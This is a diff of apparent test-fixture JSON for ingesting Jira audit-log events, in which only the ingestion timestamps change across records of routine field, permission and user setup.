@@ -4419,7 +4413,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590405219Z", + "ingested": "2021-12-15T09:00:40.254675729Z", "original": "{\"timestamp\":\"2021-11-22T00:07:09.088Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Story Points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10111\",\"id\":\"customfield_10111\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Measurement of complexity and/or size of a requirement.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Story Points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Number Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4493,7 +4487,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:33.590409522Z", + "ingested": "2021-12-15T09:00:40.254676983Z", "original": "{\"timestamp\":\"2021-11-22T00:07:09.037Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Story\",\"type\":\"ISSUE_TYPE\",\"id\":\"10001\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" 
@@ -4554,7 +4548,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590412215Z", + "ingested": "2021-12-15T09:00:40.254678173Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.794Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Rank\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10110\",\"id\":\"customfield_10110\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Global rank field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Rank\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Global Rank\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4628,7 +4622,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590414837Z", + "ingested": "2021-12-15T09:00:40.254679350Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.725Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10109\",\"id\":\"customfield_10109\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Choose an epic to assign this issue to.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Epic Link Relationship\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4702,7 +4696,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590417466Z", + "ingested": "2021-12-15T09:00:40.254680949Z", "original": "{\"timestamp\":\"2021-11-22T00:07:02.694Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Sprint\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10108\",\"id\":\"customfield_10108\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Jira Software sprint field\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Sprint\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Jira Sprint Field\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4776,7 +4770,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590420053Z", + "ingested": "2021-12-15T09:00:40.254682171Z", "original": "{\"timestamp\":\"2021-11-22T00:07:01.669Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Colour\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10107\",\"id\":\"customfield_10107\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Colour field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Colour\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Colour of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4850,7 +4844,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590422686Z", + "ingested": "2021-12-15T09:00:40.254683370Z", "original": "{\"timestamp\":\"2021-11-22T00:07:01.644Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Status\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10106\",\"id\":\"customfield_10106\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Epic Status field for Jira Software use only.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Status\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Status of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -4924,7 +4918,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590425305Z", + "ingested": "2021-12-15T09:00:40.254684537Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.522Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Epic Name\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10105\",\"id\":\"customfield_10105\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"Provide a short name to identify this epic.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Epic Name\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Name of Epic\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -4998,7 +4992,7 @@ }, "event": { "action": "jira.auditing.issue.type.created", - "ingested": "2021-12-08T14:50:33.590427925Z", + "ingested": "2021-12-15T09:00:40.254685867Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.485Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.issuetypes\",\"category\":\"issue types\",\"actionI18nKey\":\"jira.auditing.issue.type.created\",\"action\":\"Issue type created\"},\"affectedObjects\":[{\"name\":\"Epic\",\"type\":\"ISSUE_TYPE\",\"id\":\"10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "creation" 
@@ -5059,7 +5053,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:33.590430527Z", + "ingested": "2021-12-15T09:00:40.254687602Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.340Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5116,7 +5110,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:33.590433112Z", + "ingested": "2021-12-15T09:00:40.254688989Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.332Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5173,7 +5167,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590435735Z", + "ingested": "2021-12-15T09:00:40.254690166Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.313Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Original story points\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10104\",\"id\":\"customfield_10104\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Original story points\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Original story points\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5242,7 +5236,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590438655Z", + "ingested": "2021-12-15T09:00:40.254691595Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.266Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target end\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10103\",\"id\":\"customfield_10103\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted end date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target end\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target end\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5316,7 +5310,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590441306Z", + "ingested": "2021-12-15T09:00:40.254692795Z", "original": "{\"timestamp\":\"2021-11-22T00:06:59.224Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Target start\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10102\",\"id\":\"customfield_10102\"}],\"changedValues\":[{\"key\":\"Description\",\"i18nKey\":\"common.words.description\",\"to\":\"The targeted start date. This custom field is created and required by Portfolio for Jira.\"},{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Target start\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Target start\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5390,7 +5384,7 @@ }, "event": { "action": "jira.auditing.customfield.updated", - "ingested": "2021-12-08T14:50:33.590473824Z", + "ingested": "2021-12-15T09:00:40.254693984Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.990Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.updated\",\"action\":\"Custom field updated\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -5447,7 +5441,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590476704Z", + "ingested": "2021-12-15T09:00:40.254695231Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.974Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Parent Link\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10101\",\"id\":\"customfield_10101\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Parent Link\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Parent Link\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5516,7 +5510,7 @@ }, "event": { "action": "jira.auditing.customfield.created", - "ingested": "2021-12-08T14:50:33.590479359Z", + "ingested": "2021-12-15T09:00:40.254696677Z", "original": "{\"timestamp\":\"2021-11-22T00:06:58.318Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.fields\",\"category\":\"fields\",\"actionI18nKey\":\"jira.auditing.customfield.created\",\"action\":\"Custom field created\"},\"affectedObjects\":[{\"name\":\"Team\",\"type\":\"CUSTOM_FIELD\",\"uri\":\"http://jira.internal:8088/secure/admin/ConfigureCustomField!default.jspa?customFieldId=10100\",\"id\":\"customfield_10100\"}],\"changedValues\":[{\"key\":\"Name\",\"i18nKey\":\"common.words.name\",\"to\":\"Team\"},{\"key\":\"Type\",\"i18nKey\":\"common.words.type\",\"to\":\"Team\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5585,7 +5579,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590481971Z", + "ingested": "2021-12-15T09:00:40.254697851Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.162Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5659,7 +5653,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590484533Z", + "ingested": "2021-12-15T09:00:40.254699031Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.158Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"Manage Sprints\",\"to\":\"\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"Project Role\",\"to\":\"\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"Administrators\",\"to\":\"\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5733,7 +5727,7 @@ }, "event": { "action": "jira.auditing.permission.scheme.updated", - "ingested": "2021-12-08T14:50:33.590487134Z", + "ingested": "2021-12-15T09:00:40.254700257Z", "original": "{\"timestamp\":\"2021-11-22T00:06:57.138Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"action\":\"Permission scheme updated\"},\"affectedObjects\":[{\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\",\"uri\":\"http://jira.internal:8088/secure/admin/EditNotifications!default.jspa?schemeId=0\",\"id\":\"0\"}],\"changedValues\":[{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Sprints\"},{\"key\":\"Type\",\"i18nKey\":\"admin.common.words.type\",\"from\":\"\",\"to\":\"Project Role\"},{\"key\":\"Value\",\"i18nKey\":\"admin.common.words.value\",\"from\":\"\",\"to\":\"Administrators\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" 
@@ -5808,7 +5802,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:33.590489705Z", + "ingested": "2021-12-15T09:00:40.254701430Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.756Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-software-users\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-software-users\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", @@ -5883,7 +5877,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590492304Z", + "ingested": "2021-12-15T09:00:40.254702723Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.754Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Manage Group Filter Subscriptions\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -5957,7 +5951,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590498251Z", + "ingested": "2021-12-15T09:00:40.254703910Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.752Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Create Shared Objects\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6031,7 +6025,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590500992Z", + "ingested": "2021-12-15T09:00:40.254705090Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.751Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Browse Users\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", 
@@ -6105,7 +6099,7 @@ }, "event": { "action": "jira.auditing.global.permission.added", - "ingested": "2021-12-08T14:50:33.590503575Z", + "ingested": "2021-12-15T09:00:40.254706268Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.750Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"category\":\"permissions\",\"actionI18nKey\":\"jira.auditing.global.permission.added\",\"action\":\"Global permission added\"},\"affectedObjects\":[{\"name\":\"Global Permissions\",\"type\":\"PERMISSIONS\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"admin.common.words.group\",\"from\":\"\",\"to\":\"jira-administrators\"},{\"key\":\"Permission\",\"i18nKey\":\"admin.common.words.permission\",\"from\":\"\",\"to\":\"Bulk Change\"}],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6180,7 +6174,7 @@ }, "event": { "action": "jira.auditing.user.added.to.group", - "ingested": "2021-12-08T14:50:33.590506117Z", + "ingested": "2021-12-15T09:00:40.254707485Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.734Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.groupmanagement\",\"category\":\"group management\",\"actionI18nKey\":\"jira.auditing.user.added.to.group\",\"action\":\"User added to group\"},\"affectedObjects\":[{\"name\":\"jira-administrators\",\"type\":\"GROUP\",\"uri\":\"http://jira.internal:8088/secure/ViewGroup.jspa?name=jira-administrators\"},{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[],\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "group", 
@@ -6256,7 +6250,7 @@ }, "event": { "action": "jira.auditing.user.created", - "ingested": "2021-12-08T14:50:33.590508737Z", + "ingested": "2021-12-15T09:00:40.254708722Z", "original": "{\"timestamp\":\"2021-11-22T00:06:49.600Z\",\"author\":{\"name\":\"Anonymous\",\"type\":\"user\",\"id\":\"-2\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"jira.auditing.category.usermanagement\",\"category\":\"user management\",\"actionI18nKey\":\"jira.auditing.user.created\",\"action\":\"User created\"},\"affectedObjects\":[{\"name\":\"test.user\",\"type\":\"USER\",\"uri\":\"http://jira.internal:8088/secure/ViewProfile.jspa?name=test.user\",\"id\":\"JIRAUSER10000\"}],\"changedValues\":[{\"key\":\"Active / Inactive\",\"i18nKey\":\"admin.common.phrases.active.inactive\",\"to\":\"Active\"},{\"key\":\"Email\",\"i18nKey\":\"common.words.email\",\"to\":\"test.user@example.com\"},{\"key\":\"Full 